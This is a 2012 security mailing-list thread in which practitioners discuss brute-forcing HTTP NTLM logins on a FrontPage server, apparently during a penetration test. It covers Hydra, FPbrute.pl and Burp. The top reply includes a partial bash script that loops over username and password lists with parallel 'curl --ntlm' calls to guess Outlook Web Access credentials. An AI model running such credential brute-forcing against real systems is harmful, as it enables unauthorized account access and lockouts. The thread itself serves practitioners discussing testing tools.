Back when nothing was supporting Outlook Web Access bruteforcing, I've
written a simple bash script that automated the process using "curl"... I
suggest you do the same.
"curl --ntlm" -> it will be two nested for loops, the outer iterates
through usernames, the inner iterates through passwords... then process
server's answer using multiple grep and cut to check for correct/bad
credentials using variables and "if".
The only problem with that method will be the speed(lack of), so, I have
included a simple function to make sure at least "32" instances of curl are
running at any given time
===== start of code example=====
#!/bin/bash
.....
.....
CheckCurl(){
CurlCount=$(pidof curl | wc -w)
[ $CurlCount -ge 32 ] && CheckCurl
}
echo [*] Starting...
for USER in $(cat $userList)
do
for PASSWORD in $(cat $passList)
do
#before running the command, we want to make sure that the running
instances of curl are not greater than 32
CheckCurl
#note that this will save the output to a folder called "html_out", change
that or create it.
curl --ntlm -u 'domain\ $USER:$PASSWORD' blah blah blah
blah ....... & # the ending ampersand is very important for multithreading
done
done
===== End of code example=====
Hope that helps,
Sherif Eldeeb.
On Fri, May 25, 2012 at 11:10 PM, Robin Wood <[email protected]> wrote:
> On 25 May 2012 16:59, Navarro, Gregory J <[email protected]>
> wrote:
> > Do you know of a valid login but just not the password. If so just fuzz
> it with Burp
>
> I have no credentials but even if I did I don't think Burp does NTLM,
> for it to do it it would have to be able to work with the four way
> handshake and I've not seen anywhere that that appears to be an
> option. If you can point me at how to do it I'll happily try.
>
> Robin
>
> > From: [email protected] [mailto:[email protected]]
> On Behalf Of Robin Wood
> > Sent: Thursday, May 24, 2012 6:08 AM
> > To: Tony Turner; PaulDotCom Security Weekly Mailing List
> > Cc: _; [email protected]
> > Subject: Re: [Pauldotcom] hydra and HTTP NTLM
> >
> > On 24 May 2012 13:36, Tony Turner <[email protected]> wrote:
> >> Have you tried http://www.foofus.net/~jmk/tools/FPbrute.pl yet? Or is
> there
> >> a reason you wanted to use Hydra?
> >
> > I've tried that but it seems to expect the login request for a simple
> > GET. I'm testing a FrontPage install which allows me to read but then
> > fails on write. Checking the traffic when I click save it sends an
> > OPTIONS request which gets a reply of 401 which triggers FP to then
> > start the handshake.
> >
> > Robin
> >
> >> ________________________________
> >> From: Robin Wood <[email protected]>
> >> To: _ <[email protected]>
> >> Cc: "[email protected]" <[email protected]>;
> PaulDotCom
> >> Mailing List <[email protected]>
> >> Sent: Thursday, May 24, 2012 8:17 AM
> >> Subject: Re: [Pauldotcom] hydra and HTTP NTLM
> >>
> >> On 24 May 2012 13:06, _ <[email protected]> wrote:
> >>> http ntlm is IIS based windows auth.
> >>
> >> Yes but I still don't know how to attack it.
> >>
> >> Robin
> >>
> >>> On May 23, 2012, at 6:14 AM, Robin Wood <[email protected]> wrote:
> >>>
> >>>> Anyone know how to use the new HTTP NTLM feature in Hydra? I'm trying
> >>>> to brute force a MS Front Page login which only asks for
> >>>> authentication when the OPTIONS method is used as far as I can tell.
> >>>>
> >>>> Robin
> >>>>
> >>>>
> >>>>
> >>>> This list is sponsored by Cenzic
> >>>> --------------------------------------
> >>>> Let Us Hack You. Before Hackers Do!
> >>>> It's Finally Here - The Cenzic Website HealthCheck. FREE.
> >>>> Request Yours Now!
> >>>> http://www.cenzic.com/2009HClaunch_Securityfocus
> >>>> --------------------------------------
> >>>>
> >> _______________________________________________
> >> Pauldotcom mailing list
> >> [email protected]
> >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> >> Main Web Site: http://pauldotcom.com
> >>
> >>
> >>
> >> _______________________________________________
> >> Pauldotcom mailing list
> >> [email protected]
> >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> >> Main Web Site: http://pauldotcom.com
> >
> >
> >
> > This list is sponsored by Cenzic
> > --------------------------------------
> > Let Us Hack You. Before Hackers Do!
> > It's Finally Here - The Cenzic Website HealthCheck. FREE.
> > Request Yours Now!
> > http://www.cenzic.com/2009HClaunch_Securityfocus
> > --------------------------------------
> >
> _______________________________________________
> Pauldotcom mailing list
> [email protected]
> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> Main Web Site: http://pauldotcom.com
>
_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
